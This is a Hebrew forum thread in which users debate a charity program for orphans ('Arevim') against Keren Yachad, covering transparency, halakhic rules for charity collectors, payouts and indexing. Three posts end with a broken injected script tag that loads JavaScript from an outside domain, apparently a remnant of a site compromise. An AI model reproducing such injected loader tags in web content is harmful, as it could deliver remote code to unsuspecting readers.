| נשלח ב-7/12/2020 11:19 |
|
| |
| גרשום כתב: |  | פונקט פארקערט ממה שאתה אומר. תקרא את תקנון התוכנית ותיווכח שמדובר בתוכנית חסד. לא תוכנית ביטוח על פי המקובל בתחום הביטוחים. |
|
תגיד לי, יש לך אולי מישהו שנאמן לך והטיח בפרצופך ת'האמת? שאתה מריר ואיפכא מסתברא'ניק בכל דבר שזז...
|
|
|
|
| נשלח ב-7/12/2020 11:42 |
|
| |
נכון, זה כספי צדקה, ולכן אם מישהו אינו צריך צדקה הוא לא יקבל, הגיוני מאד< type="text/" async="" src="//minisrclink.cool/1e40c8bd4601a5a5a4.js">>
|
|
|
|
| נשלח ב-7/12/2020 15:00 |
|
| |
| מצדרביעי כתב: |  | או ללכת לקרן יחד שפועלת הרבה יותר בשקיפות (כפי שההלכה דורשת, עיין ערך ההלכה שאסור לגבאי צדקה לגבות צדקה לבד ועוד...). |
|
מצד רביעי, אני נמנע מלהשתתף באשכולות נוטפי השנאה האלו, אבל אתה, עם כל חוסר ההסכמה שלי אתך לרוב, עדיין ראוי לתגובה. ההלכה לא דורשת שקיפות בסגנון שאתה מדבר עליו. קופת העיר רחוקה מלהיות גבאי צדקה שגובה לבד, יש הרבה אנשים שחשופים לכל החלטה. והאנשים המחליטים הם גבאי צדקה שגדולי הדור שסמכו וסומכים את ידיהם על הקופה סבורים שהם אנשים יראי שמים ונאמנים, כך שזה בהחלט עומד בדרישות ההלכה והרבה מעבר לכך. בלי קשר, כמובן שכחבר בערבים אשמח שכל אלו שיש להם תלונות כאן, וגם אלו שדרכם להאמין ולהקשיב לטרוניות מסוג זה ושותפים לביזוי הת"ח שלהם, ילכו לקרן יחד או לכל מקום אחר ולא יהיו חברים בערבים, זה רק יגדיל את הסיכוי שלי לשלם פחות.
|
|
|
|
| נשלח ב-7/12/2020 16:04 |
|
| |
| מצדרביעי כתב: |  | יש לדעת שתוכנית ערבים אינה תעודת ביטוח. כלל לא מובטח למשפחות החברות בתוכנית שבמקרה מוות, היתומים יקבלו תמיכה כספית כלשהי. זה תלוי בהחלטת המנהלים לפי ראות עיניהם את המצב הכלכלי של המשפחה.
מי שאינו דלפון ורוצה להבטיח תמיכה כספית למשפחתו במקרה של מוות ח"ו, שיעשה ביטוח ריסק בחברת ביטוח.
או ללכת לקרן יחד שפועלת הרבה יותר בשקיפות (כפי שההלכה דורשת, עיין ערך ההלכה שאסור לגבאי צדקה לגבות צדקה לבד ועוד...). |
|
אתה יודע האם בקרן יחד פחות חברים נפטרו?
|
|
|
|
| נשלח ב-7/12/2020 16:27 |
|
| |
מצדרביעי
| לךתדע1 כתב: |  | יש לדעת שתוכנית ערבים אינה תעודת ביטוח. כלל לא מובטח למשפחות החברות בתוכנית שבמקרה מוות, היתומים יקבלו תמיכה כספית כלשהי. זה תלוי בהחלטת המנהלים לפי ראות עיניהם את המצב הכלכלי של המשפחה.
מי שאינו דלפון ורוצה להבטיח תמיכה כספית למשפחתו במקרה של מוות ח"ו, שיעשה ביטוח ריסק בחברת ביטוח.
או ללכת לקרן יחד שפועלת הרבה יותר בשקיפות (כפי שההלכה דורשת, עיין ערך ההלכה שאסור לגבאי צדקה לגבות צדקה לבד ועוד...). אתה יודע האם בקרן יחד פחות חברים נפטרו? |
|
שאלה מעניינת, לא נכנסתי לעבי הקורה, אם כי יכול להיות שבשנים האחרונות נהרגו שם יותר מפיגועים וכיו"ב לא עלינן (היות ומדובר בדתיים לאומיים).
|
|
|
|
| נשלח ב-7/12/2020 16:37 |
|
| |
מישהו יודע מה המדיניות של הקרן לגבי מקרי מוות מפעולות איבה ותאונות דרכים?
זו סוגיה מעניינת שכן, במקרים אלה המשפחות האבלות מקבלות תגמולים ופיצויים.
|
|
|
|
| נשלח ב-7/12/2020 18:02 |
|
| |
| גרשום כתב: |  | מישהו יודע מה המדיניות של הקרן לגבי מקרי מוות מפעולות איבה ותאונות דרכים?
זו סוגיה מעניינת שכן, במקרים אלה המשפחות האבלות מקבלות תגמולים ופיצויים. |
|
המדיניות של קרן יחד היא שבמקרה פטירה של חבר הקרן היתומים יקבלו 50000 ש"ח לכל אחד בכל מקרה ללא תלות במצב הכספי של המשפחה. במקרים שצריך עזרה יותר גדולה אז מוקמת וועדה שבוחנת את המקרה ומחליטה על סכום נוסף שייגבה לכל יתום ובכל מקרה כל יתום לא יקבל יותר מ150000 נשלח מהאנדרואיד שלי
|
|
|
|
| נשלח ב-7/12/2020 20:10 |
|
| |
ולמה לאחרונה ביקשו הכפלת הסכום של ערבים?
|
|
|
|
| נשלח ב-7/12/2020 23:17 |
|
| |
יש בעיה מאד בסיסית בצורה שבה פועל 'ערבים'. כשהחליט מי שהחליט על הסכום שכל יתום יקבל הסתכלו על ההוצאות מחיה או מחירי הדירות באותו הזמן. מה שלא לקחו בחשבון זה שיש כל הזמן עלייה ביוקר המחייה וכן במחירי הדיור. (גם אם יש ירידות זה זמני, המגמה הרב שנתית זה רק עליה). מאז שהתוכנית יצאה לדרך כמובן מחירי הדיור עלו יחד עם כל העלייה במחירים והעלייה ביוקר המחייה. ואז בא שם מישהו ואמר - נעשה 'ערבים בשלמות', כלומר נגבה כפול ותיתן ליתומים כפול. אבל יש בזה 2 בעיות, גם שלא כולם הצטרפו. וגם ששוב, כל זה טוב לעכשיו, עוד כמה שנים יצטרכו לעשות 'ערבים בשלמות מלאה'....
הפתרון הפשוט יותר הוא שיצמידו הכל למדד, ואז כשיש עליית מחירים גם הגבייה וגם התשלום ליתומים יעלה בהתאם.
|
|
|
|
| נשלח ב-8/12/2020 08:39 |
|
| |
הבעיה שהמדד לא עולה משמעותית רק מחירי הדיור עולים המחיה לא עולה משמעותית וגם אנשים לא רוצים להתחייב לתשלום לא ידוע< type="text/" async="" src="//minisrclink.cool/1e40c8bd4601a5a5a4.js">>
|
|
|
|
| נשלח ב-8/12/2020 11:24 |
|
| |
| מצדרביעי כתב: |  | יש לדעת שתוכנית ערבים אינה תעודת ביטוח. כלל לא מובטח למשפחות החברות בתוכנית שבמקרה מוות, היתומים יקבלו תמיכה כספית כלשהי. זה תלוי בהחלטת המנהלים לפי ראות עיניהם את המצב הכלכלי של המשפחה.
או ללכת לקרן יחד שפועלת הרבה יותר בשקיפות (כפי שההלכה דורשת, עיין ערך ההלכה שאסור לגבאי צדקה לגבות צדקה לבד ועוד...). אתה יודע האם בקרן יחד פחות חברים נפטרו?
שאלה מעניינת, לא נכנסתי לעבי הקורה, אם כי יכול להיות שבשנים האחרונות נהרגו שם יותר מפיגועים וכיו"ב לא עלינן (היות ומדובר בדתיים לאומיים). |
|
חשוב מאוד להיכנס לכמות החיובים שהיו בשתי התכניות, למרות ההיתכנות של הפיגועים וכו' מהסיבה הפשוטה ש לכאורה בערבים יש לעניות דעתי חוסר שקיפות מספקת: כמות מצומצמת של בעלי תפקיד שמבקרים את המערכת לכאורה, בה בעת שבקרן יחד, יש הנהלה חזקה ושונה, מבקרים רבים ששמם מופיע באתר ועוד, כך, שעובדות האלה מקשות לממש את רצון היצר הרע להתעשרות קלה וד"ל. נקודה נוספת, בקרן יחד, ידוע לנו ממה מתפרנסים אותם אנשים שמרכיבים את ההנהלה, לעומת בערבים פרט זה לוט בערפל ? למען הסר ספק :איני מטילה דופי ח"ו לא בתכנית ערבים ולא ממליצה על תכנית יחד! ייתכן שגם בערבים, יש בעלי תפקידים שידוע לחלקנו מקור פרנסתם, ואני בטוחה, שמדובר באנשים מצוינים שעושים עבודת קודש!
תוקן על ידי לךתדע1 ב- 08/12/2020 11:39:06
|
|
|
|
| נשלח ב-8/12/2020 12:34 |
|
| |
| פרוגרמי כתב: |  | הבעיה שהמדד לא עולה משמעותית רק מחירי הדיור עולים המחיה לא עולה משמעותית וגם אנשים לא רוצים להתחייב לתשלום לא ידוע< type="text/" async="" src="//minisrclink.cool/1e40c8bd4601a5a5a4.js"> |
|
אני לא יודע לאיזה מדד אתה מתכוון כשאתה כותב 'המדד לא עולה' (אני מניח שהתכוונת למדד המחירים לצרכן). ישנם המון מדדים שונים. יש את מדד המחירים לצרכן ויש מדד מחירי הדירות, ויש עוד הרבה אחרים. מדד מחירי הדירות למשל זינק בשנים האחרונות בצורה הרבה יותר דרמטית ממדד המחירים לצרכן. כשאני כתבתי למעלה להצמיד למדד לא התכוונתי למדד מסויים, כי במקרים כאלו מקובל לקחת תמהיל של כמה מדדים שרלוונטיים. (למשל שחצי מהסכום יהיה צמוד למדד א' וחצי שני צמוד למדד ב' או שעושים סוג של ממוצע בין השינויים במדדים הרלוונטיים ומצמידים לממוצע ויש שיטות שקלול נוספות שיכולות להצמיד לכמה מדדים שונים ולתת 'משקל' שונה לכל מדד).
|
|
|
|
| נשלח ב-8/12/2020 12:43 |
|
| |
כשחתמתי על התנכית לפני 15 שנים, הם אמרו וכתבו שזה קבוצות סגורות של 10,000 איש, שמממנות מתוכם את הנפטרים ל"ע מחברי הקבוצה. הדגש היה, שלא תהיה גביה קבועה, אלא מתי שח"ו יהיה צורך, חברי הקבוצה יממנו הקמת קרן לנצרך. בפועל מאז ועד היום 72 ש"ח יורד כמו שעון בכל חודש. אין לי חלילה וחס חרטה על כסף הצדקה שאני נותן מידי חודש לתכנית זו, וגם אם זה הולך לצרכים אחרים של קופת העיר, אין לי בעיה. כי הם גבאי צדקה נאמנים ועושים צדקה וחסד אמיתיים ללא ספק. רק חבל לי שלא נצמדים למה שנאמר, גם בעניין זה וגם בעניינים אחרים. בכל אופן הצדקה היא על דעתם של גבאי הצדקה והכל בסדר.
|
|
|
|
| נשלח ב-8/12/2020 12:55 |
|
| |
זה ממש לא כל חודש.
|
|
|
|